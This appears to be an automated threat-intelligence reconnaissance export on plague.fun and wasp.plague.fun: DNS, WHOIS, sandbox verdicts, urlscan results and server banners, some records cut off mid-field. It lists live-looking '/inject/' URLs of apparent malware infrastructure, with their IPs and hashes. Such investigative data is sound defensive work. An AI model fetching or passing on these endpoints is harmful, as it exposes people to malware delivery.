"kangmelhapatzsupp.ml": {"record_type": "AAAA", "resolved_at": "2022-12-08T15:19:34.002669173Z"}, "www.portsmouth-boat-trips.co.uk": {"record_type": "AAAA", "resolved_at": "2022-12-11T20:27:58.554182415Z"}, "biolefirsmar.tk": {"record_type": "AAAA", "resolved_at": "2022-12-09T16:41:18.225114327Z"}, "www.thedollhousemuseum.com.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2022-10-31T16:19:02.095549627Z"}, "greneflahiggewhi.gq": {"record_type": "AAAA", "resolved_at": "2022-12-01T14:51:12.241455327Z"}, "lsj47.com": {"record_type": "AAAA", "resolved_at": "2022-12-03T13:40:01.170257958Z"}, "marceee3.fun": {"record_type": "AAAA", "resolved_at": "2022-10-28T07:45:01.892996646Z"}, "paykhalcautel.ml": {"record_type": "AAAA", "resolved_at": "2022-12-08T15:19:08.131944881Z"}, "www.holidaysolutions-spain.com": {"record_type": "CNAME", "resolved_at": "2022-11-26T16:46:07.550365371Z"}, "disiwildde.tk": {"record_type": "AAAA", "resolved_at": "2022-12-01T17:01:33.524233333Z"}, "www.arro-studio.com": {"record_type": "AAAA", "resolved_at": "2022-12-08T11:47:25.743764463Z"}, "fatootaconssac.cf": {"record_type": "AAAA", "resolved_at": "2022-12-12T12:26:52.345682761Z"}, "fancyacake.net": {"record_type": "AAAA", "resolved_at": "2022-11-30T15:56:40.221799680Z"}}, "name 2606:4700:3033::6815:1cf0 2022-12-18 00:23:19 Country No Country Name Extractor 0 0 5 0 None Italy Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://www.register.it Updated Date: 2022-01-13T08:14:30Z Creation Date: 2010-01-12T13:36:45Z Registry Expiry Date: 2023-01-12T13:36:45Z Registrar: Register SPA Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:22:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://we.register.it Updated Date: 2022-02-14T00:00:00Z Creation Date: 2010-01-12T00:00:00Z Registrar Registration Expiration Date: 2023-01-12T00:00:00Z Registrar: REGISTER S.P.A. Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Reseller: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: Registrant Name: Global Domain Privacy Registrant Organization: GLOBAL DOMAIN PRIVACY Registrant Street: Via Zanchi 22 Registrant City: Bergamo Registrant State/Province: BG Registrant Postal Code: 24126 Registrant Country: IT Registrant Phone: +39.353230400 Registrant Phone Ext: Registrant Fax: +39.353230312 Registrant Fax Ext: Registrant Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Admin ID: Admin Name: Global Domain Privacy Admin Organization: GLOBAL DOMAIN PRIVACY Admin Street: Via Zanchi 22 Admin City: Bergamo Admin State/Province: BG Admin Postal Code: 24126 Admin Country: IT Admin Phone: +39.353230400 Admin Phone Ext: Admin Fax: +39.353230312 Admin Fax Ext: Admin Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Tech ID: Tech Name: Global Domain Privacy Tech Organization: GLOBAL DOMAIN PRIVACY Tech Street: Via Zanchi 22 Tech City: Bergamo Tech State/Province: BG Tech Postal Code: 24126 Tech Country: IT Tech Phone: +39.353230400 Tech Phone Ext: Tech Fax: +39.353230312 Tech Fax Ext: Tech Email: private@register.it Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of whois database: 2022-12-18T00:22:21Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:04:01 Country No Country Name Extractor 0 0 4 0 None United States googleusercontent.com 2022-12-18 00:12:22 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 6, u'search_terms': [{u'id': u'host', u'value': u'188.114.97.3'}], u'result': [{u'environment_id': 120, u'job_id': u'63922bb48f5d337c6c22e89f', u'analysis_start_time': u'2022-12-08 18:23:49', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': 2, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'edc48d9486432976c7bb048b0479c1555a4e484e1cf97587fa7a09b5dec4301b', u'type': None, u'type_short': u'url', u'size': 45}, {u'environment_id': 100, u'job_id': u'6390e9ccb71c6170ee5b000d', u'analysis_start_time': u'2022-12-07 19:30:20', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 2, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'1e9f62edfd36b9b4222f2e44c7217d886b73e8a591106a63972a35537fa3c8bd', u'type': None, u'type_short': u'url', u'size': 44}, {u'environment_id': 160, u'job_id': u'6390e96c9f4f5323541e954c', u'analysis_start_time': u'2022-12-07 19:28:45', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 24, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'edc48d9486432976c7bb048b0479c1555a4e484e1cf97587fa7a09b5dec4301b', u'type': None, u'type_short': u'url', u'size': 45}, {u'environment_id': 100, u'job_id': u'6390e944b4ce99098c1f0ccd', u'analysis_start_time': u'2022-12-07 19:28:05', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 2, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'edc48d9486432976c7bb048b0479c1555a4e484e1cf97587fa7a09b5dec4301b', u'type': None, u'type_short': u'url', u'size': 45}, {u'environment_id': 160, u'job_id': u'636be07de7135354b135c627', u'analysis_start_time': u'2022-11-09 17:16:46', u'vx_family': u'Malware site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 17, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'1e9f62edfd36b9b4222f2e44c7217d886b73e8a591106a63972a35537fa3c8bd', u'type': None, u'type_short': u'url', u'size': 44}, {u'environment_id': 120, u'job_id': u'62c6ec3e60d7912c145bd233', u'analysis_start_time': u'2022-07-07 14:22:54', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'1e9f62edfd36b9b4222f2e44c7217d886b73e8a591106a63972a35537fa3c8bd', u'type': None, u'type_short': u'url', u'size': 44}]} 188.114.97.3 2022-12-18 00:21:37 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 200 OK Server: Werkzeug/2.2.2 Python/3.9.11 Date: Content-Type: text/html; charset=utf-8 Content-Length: 29 Connection: close 20.226.83.185 2022-12-18 00:02:50 Domain Registrar No Whois 0 0 1 0 None ENOM, INC. plague.fun 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None LF-X1U.00014A10EF0C (Net ID: 00:01:4A:10:EF:0C) 37.7803446,-122.3906132 2022-12-18 00:06:35 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.97.0:443 188.114.97.0 2022-12-18 00:11:19 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None wasp.plague.fun [{u'sort': [1668435861696, u'5c215008-1899-4aaa-8f55-bc69632d1bbe'], u'task': {u'domain': u'plague.fun', u'uuid': u'5c215008-1899-4aaa-8f55-bc69632d1bbe', u'url': u'http://plague.fun/', u'visibility': u'public', u'time': u'2022-11-14T14:24:21.696Z', u'apexDomain': u'plague.fun', u'method': u'manual'}, u'stats': {u'uniqIPs': 3, u'uniqCountries': 2, u'encodedDataLength': 60686, u'requests': 5, u'dataLength': 59699}, u'screenshot': u'https://urlscan.io/screenshots/5c215008-1899-4aaa-8f55-bc69632d1bbe.png', u'result': u'https://urlscan.io/api/v1/result/5c215008-1899-4aaa-8f55-bc69632d1bbe/', u'_id': u'5c215008-1899-4aaa-8f55-bc69632d1bbe', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'plague.fun', u'title': u'Plague', u'url': u'https://plague.fun/', u'ip': u'2a06:98c1:3120::3', u'tlsValidFrom': u'2022-10-30T18:19:31.000Z', u'asnname': u'CLOUDFLARENET, US', u'server': u'cloudflare', u'tlsIssuer': u'E1', u'tlsValidDays': 89, u'country': u'US', u'redirected': u'https-only', u'apexDomain': u'plague.fun', u'tlsAgeDays': 14, u'asn': u'AS13335'}}, {u'sort': [1667535168727, u'932845e7-6f04-44ea-ba43-55e59845ee6d'], u'task': {u'domain': u'wasp.plague.fun', u'uuid': u'932845e7-6f04-44ea-ba43-55e59845ee6d', u'url': u'http://wasp.plague.fun/inject/Fu643XzaSbmCcnGN/', u'visibility': u'public', u'time': u'2022-11-04T04:12:48.727Z', u'apexDomain': u'plague.fun', u'method': u'manual'}, u'stats': {u'uniqIPs': 0, u'uniqCountries': 0, u'requests': 0, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/932845e7-6f04-44ea-ba43-55e59845ee6d.png', u'result': u'https://urlscan.io/api/v1/result/932845e7-6f04-44ea-ba43-55e59845ee6d/', u'_id': u'932845e7-6f04-44ea-ba43-55e59845ee6d', u'page': {u'url': u'http://wasp.plague.fun/inject/Fu643XzaSbmCcnGN/', u'domain': u'wasp.plague.fun'}}, {u'sort': [1667534980637, u'd4b37d48-0ead-4fba-ba3d-b841692f7713'], u'task': {u'domain': u'wasp.plague.fun', u'uuid': u'd4b37d48-0ead-4fba-ba3d-b841692f7713', u'url': u'http://wasp.plague.fun/inject', u'visibility': u'public', u'time': u'2022-11-04T04:09:40.637Z', u'apexDomain': u'plague.fun', u'method': u'manual'}, u'stats': {u'uniqIPs': 0, u'uniqCountries': 0, u'requests': 0, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/d4b37d48-0ead-4fba-ba3d-b841692f7713.png', u'result': u'https://urlscan.io/api/v1/result/d4b37d48-0ead-4fba-ba3d-b841692f7713/', u'_id': u'd4b37d48-0ead-4fba-ba3d-b841692f7713', u'page': {u'url': u'http://wasp.plague.fun/inject', u'domain': u'wasp.plague.fun'}}, {u'sort': [1667423996474, u'123e1e1c-97d3-4aac-974d-4d17eba3d22c'], u'task': {u'domain': u'wasp.plague.fun', u'uuid': u'123e1e1c-97d3-4aac-974d-4d17eba3d22c', u'url': u'http://wasp.plague.fun/inject/Fu643XzaSbmCcnGN', u'visibility': u'public', u'time': u'2022-11-02T21:19:56.474Z', u'apexDomain': u'plague.fun', u'method': u'manual'}, u'stats': {u'uniqIPs': 0, u'uniqCountries': 0, u'requests': 0, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/123e1e1c-97d3-4aac-974d-4d17eba3d22c.png', u'result': u'https://urlscan.io/api/v1/result/123e1e1c-97d3-4aac-974d-4d17eba3d22c/', u'_id': u'123e1e1c-97d3-4aac-974d-4d17eba3d22c', u'page': {u'url': u'http://wasp.plague.fun/inject/Fu643XzaSbmCcnGN', u'domain': u'wasp.plague.fun'}}, {u'sort': [1667420541130, u'de6e643e-dfc8-4678-97ff-3cf8c31216d8'], u'task': {u'domain': u'plague.fun', u'uuid': u'de6e643e-dfc8-4678-97ff-3cf8c31216d8', u'url': u'http://plague.fun/', u'visibility': u'public', u'time': u'2022-11-02T20:22:21.130Z', u'apexDomain': u'plague.fun', u'method': u'manual'}, u'stats': {u'uniqIPs': 3, u'uniqCountries': 2, u'encodedDataLength': 60656, u'requests': 5, u'dataLength': 59699}, u'screenshot': u'https://urlscan.io/screenshots/de6e643e-dfc8-4678-97ff-3cf8c31216d8.png', u'result': u'https://urlscan.io/api/v1/result/de6e643e-dfc8-4678-97ff-3cf8c31216d8/', u'_id': u'de6e643e-dfc8-4678-97ff-3cf8c31216d8', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'plague.fun', u'title': u'Plague', u'url': u'https://plague.fun/', u'ip': u'2a06:98c1:3121::3', u'tlsValidFrom': u'2022-10-30T18:19:31.000Z', u'asnname': u'CLOUDFLARENET, US', u'server': u'cloudflare', u'tlsIssuer': u'E1', u'tlsValidDays': 89, u'country': u'US', u'redirected': u'https-only', u'apexDomain': u'plague.fun', u'tlsAgeDays': 3, u'asn': u'AS13335'}}, {u'sort': [1666271015083, u'e64c5542-3885-407e-8377-5eb28bc8636a'], u'task': {u'domain': u'plague.fun', u'uuid': u'e64c5542-3885-407e-8377-5eb28bc8636a', u'url': u'http://plague.fun/', u'visibility': u'public', u'time': u'2022-10-20T13:03:35.083Z', u'apexDomain': u'plague.fun', u'method': u'manual'}, u'stats': {u'uniqIPs': 3, u'uniqCountries': 2, u'encodedDataLength': 60644, u'requests': 5, u'dataLength': 59699}, u'screenshot': u'https://urlscan.io/screenshots/e64c5542-3885-407e-8377-5eb28bc8636a.png', u'result': u'https://urlscan.io/api/v1/result/e64c5542-3885-407e-8377-5eb28bc8636a/', u'_id': u'e64c5542-3885-407e-8377-5eb28bc8636a', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'plague.fun', u'title': u'Plague', u'url': u'https://plague.fun/', u'ip': u'2a06:98c1:3120::3', u'tlsValidFrom': u'2022-09-01T17:51:42.000Z', u'asnname': u'CLOUDFLARENET, US', u'server': u'cloudflare', u'tlsIssuer': u'E1', u'tlsValidDays': 89, u'country': u'US', u'redirected': u'https-only', u'apexDomain': u'plague.fun', u'tlsAgeDays': 48, u'asn': u'AS13335'}}, {u'sort': [1666223938404, u'ead56e70-597e-4a46-a12e-1b2659f71d96'], u'task': {u'domain': u'wasp.plague.fun', u'uuid': u'ead56e70-597e-4a46-a12e-1b2659f71d96', u'url': u'http://wasp.plague.fun/inject/TJlP9P7aJ8QTzB98', u'visibility': u'public', u'time': u'2022-10-19T23:58:58.404Z', u'apexDomain': u'plague.fun', u'method': u'manual'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 22121, u'requests': 1, u'dataLength': 21945}, u'screenshot': u'https://urlscan.io/screenshots/ead56e70-597e-4a46-a12e-1b2659f71d96.png', u'result': u'https://urlscan.io/api/v1/result/ead56e70-597e-4a46-a12e-1b2659f71d96/', u'_id': u'ead56e70-597e-4a46-a12e-1b2659f71d96', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'wasp.plague.fun', u'url': u'http://wasp.plague.fun/inject/TJlP9P7aJ8QTzB98', u'ip': u'20.169.21.92', u'asnname': u'MICROSOFT-CORP-MSN-AS-BLOCK, US', u'server': u'Werkzeug/2.2.2 Python/3.8.10', u'country': u'US', u'apexDomain': u'plague.fun', u'asn': u'AS8075'}}, {u'sort': [1666090812265, u'249913bc-cb7c-47ec-8786-fd85b1632aa0'], u'task': {u'domain': u'plague.fun', u'uuid': u'249913bc-cb7c-47ec-8786-fd85b1632aa0', u'url': u'https://plague.fun/', u'visibility': u'public', u'time': u'2022-10-18T11:00:12.265Z', u'apexDomain': u'plague.fun', u'method': u'manual'}, u'stats': {u'uniqIPs': 3, u'uniqCountries': 2, u'encodedDataLength': 60683, u'requests': 5, u'dataLength': 59699}, u'screenshot': u'https://urlscan.io/screenshots/249913bc-cb7c-47ec-8786-fd85b1632aa0.png', u'result': u'https://urlscan.io/api/v1/result/249913bc-cb7c-47ec-8786-fd85b1632aa0/', u'_id': u'249913bc-cb7c-47ec-8786-fd85b1632aa0', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'plague.fun', u'title': u'Plague', u'url': u'https://plague.fun/', u'ip': u'2a06:98c1:3120::3', u'tlsValidFrom': u'2022-09-01T17:51:42.000Z', u'asnname': u'CLOUDFLARENET, US', u'server': u'cloudflare', u'tlsIssuer': u'E1', u'tlsValidDays': 89, u'country': u'US', u'apexDomain': u'plague.fun', u'tlsAgeDays': 46, u'asn': u'AS13335'}}, {u'sort': [1666055853313, u'22b9abd4-5440-42a8-b548-fbbe95940642'], u'task': {u'domain': u'wasp.plague.fun', u'uuid': u'22b9abd4-5440-42a8-b548-fbbe95940642', u'url': u'http://wasp.plague.fun/inject/MTJ8Vp5aynR51YMM', u'visibility': u'public', u'time': u'2022-10-18T01:17:33.313Z', u'apexDomain': u'plague.fun', u'method': u'manual'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 23564, u'requests': 1, u'dataLength': 23388}, u'screenshot': u'https://urlscan.io/screenshots/22b9abd4-5440-42a8-b548-fbbe95940642.png', u'result': u'https://urlscan.io/api/v1/result/22b9abd4-5440-42a8-b548-fbbe95940642/', u'_id': u'22b9abd4-5440-42a8-b548-fbbe95940642', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'wasp.plague.fun', u'url': u'http://wasp.plague.fun/inject/MTJ8Vp5aynR51YMM', u'ip': u'20.169.21.92', u'asnname': u'MICROSOFT-CORP-MSN-AS-BLOCK, US', u'server': u'Werkzeug/2.2.2 Python/3.8.10', u'country': u'US', u'apexDomain': u'plague.fun', u'asn': u'AS8075'}}, {u'sort': [1664193644795, u'3960c76d-b9a3-4ada-89bf-eec97db088e1'], u'task': {u'domain': u'wasp.plague.fun', u'uuid': u'3960c76d-b9a3-4ada-89bf-eec97db088e1', u'url': u'http://wasp.plague.fun/inject/PDS1ays5XQVjXMk3', u'visibility': u'public', u'time': u'2022-09-26T12:00:44.795Z', u'apexDomain': u'plague.fun', u'method': u'manual'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 21944, u'requests': 1, u'dataLength': 21768}, u'screenshot': u'https://urlscan.io/screenshots/3960c76d-b9a3-4ada-89bf-eec97db088e1.png', u'result': u'https://urlscan.io/api/v1/result/3960c76d-b9a3-4ada-89bf-eec97db088e1/', u'_id': u'3960c76d-b9a3-4ada-89bf-eec97db088e1', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'wasp.plague.fun', u'url': u'http://wasp.plague.fun/inject/PDS1ays5XQVjXMk3', u'ip': u'52.170.20.36', u'asnname': u'MICROSOFT-CORP-MSN-AS-BLOCK, US', u'server': u'Werkzeug/2.2.2 Python/3.8.10', u'country': u'US', u'apexDomain': u'plague.fun', u'asn': u'AS8075'}}, {u'sort': [1664185956439, u'17e61e3e-7255-49bd-88b4-ba451c080817'], u'task': {u'domain': u'wasp.plague.fun', u'uuid': u'17e61e3e-7255-49bd-88b4-ba451c080817', u'url': u'http://wasp.plague.fun', u'visibility': u'public', u'time': u'2022-09-26T09:52:36.439Z', u'apexDomain': u'plague.fun', u'method': u'manual'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 267, u'requests': 1, u'dataLength': 94}, u'screenshot': u'https://urlscan.io/screenshots/17e61e3e-7255-49bd-88b4-ba451c080817.png', u'result': u'https://urlscan.io/api/v1/result/17e61e3e-7255-49bd-88b4-ba451c080817/', u'_id': u'17e61e3e-7255-49bd-88b4-ba451c080817', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'wasp.plague.fun', u'url': 2022-12-18 00:03:08 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.196 34.149.204.188 2022-12-18 00:14:47 Internet Name - Unresolved No VirusTotal 0 0 1 0 None api.plague.fun plague.fun 2022-12-18 00:12:26 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NJ', u'country_tld': u'.us', u'ip': u'2606:4700:3031::6815:7b3', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'Newark', u'network': u'2606:4700:3030::/44', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 40.7641, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'CLOUDFLARENET', u'postal': u'07104', u'asn': u'AS13335', u'country': u'US', u'region': u'New Jersey', u'longitude': -74.1654, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} 2606:4700:3031::6815:7b3 2022-12-18 00:23:30 URL (Uses Javascript) No Page Information 0 0 3 0 None http://webmail.zerotwo-best-waifu.online Not configured webmail
2022-12-18 00:08:42 Raw Data from RIRs No LeakIX 0 0 1 0 None {u'Services': [{u'protocol': u'http', u'event_type': u'service', u'ip': u'51.103.210.236', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'MICROSOFT-CORP-MSN-AS-BLOCK', u'asn': 8075, u'network': u'51.103.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': [{u'version': u'3.10.6', u'name': u'Python', u'fingerprint': u''}], u'version': u'2.2.2', u'os': u'', u'name': u'Werkzeug', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c95e97940ac8d25d76ee211a43b58648d1fa36ee91fa36ee95c9f5d60', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'94', u'server': u'Werkzeug/2.2.2 Python/3.10.6'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'CH-ZH', u'country_iso_code': u'CH', u'city_name': u'Zurich', u'location': {u'lat': 47.3682, u'lon': 8.5671}, u'country_name': u'Switzerland', u'continent_name': u'Europe', u'region_name': u'Zurich'}, u'host': u'51.103.210.236', u'summary': u'Server: Werkzeug/2.2.2 Python/3.10.6\r\nDate: Fri, 18 Nov 2022 14:31:44 GMT\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 94\r\nConnection: close\r\n\n\nRoses are red\n

\nViolets are blue\n

\nWasp is happy\n

\nBecause he grabbed you', u'time': u'2022-11-18T14:31:43.869626235Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'51.103.210.236', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'MICROSOFT-CORP-MSN-AS-BLOCK', u'asn': 8075, u'network': u'51.103.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': [{u'version': u'3.10.6', u'name': u'Python', u'fingerprint': u''}], u'version': u'2.2.2', u'os': u'', u'name': u'Werkzeug', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c95e97940ac8d25d76ee211a43b58648d1fa36ee91fa36ee95c9f5d60', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'94', u'server': u'Werkzeug/2.2.2 Python/3.10.6'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'CH-ZH', u'country_iso_code': u'CH', u'city_name': u'Zurich', u'location': {u'lat': 47.3682, u'lon': 8.5671}, u'country_name': u'Switzerland', u'continent_name': u'Europe', u'region_name': u'Zurich'}, u'host': u'51.103.210.236', u'summary': u'Server: Werkzeug/2.2.2 Python/3.10.6\r\nDate: Mon, 28 Nov 2022 18:36:21 GMT\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 94\r\nConnection: close\r\n\n\nRoses are red\n

\nViolets are blue\n

\nWasp is happy\n

\nBecause he grabbed you', u'time': u'2022-11-28T18:36:21.778535407Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'51.103.210.236', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'MICROSOFT-CORP-MSN-AS-BLOCK', u'asn': 8075, u'network': u'51.103.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': [{u'version': u'3.10.6', u'name': u'Python', u'fingerprint': u''}], u'version': u'2.2.2', u'os': u'', u'name': u'Werkzeug', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c95e97940ac8d25d76ee211a43b58648d1fa36ee91fa36ee95c9f5d60', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'94', u'server': u'Werkzeug/2.2.2 Python/3.10.6'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'CH-ZH', u'country_iso_code': u'CH', u'city_name': u'Zurich', u'location': {u'lat': 47.3682, u'lon': 8.5671}, u'country_name': u'Switzerland', u'continent_name': u'Europe', u'region_name': u'Zurich'}, u'host': u'51.103.210.236', u'summary': u'Server: Werkzeug/2.2.2 Python/3.10.6\r\nDate: Wed, 09 Nov 2022 04:11:29 GMT\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 94\r\nConnection: close\r\n\n\nRoses are red\n

\nViolets are blue\n

\nWasp is happy\n

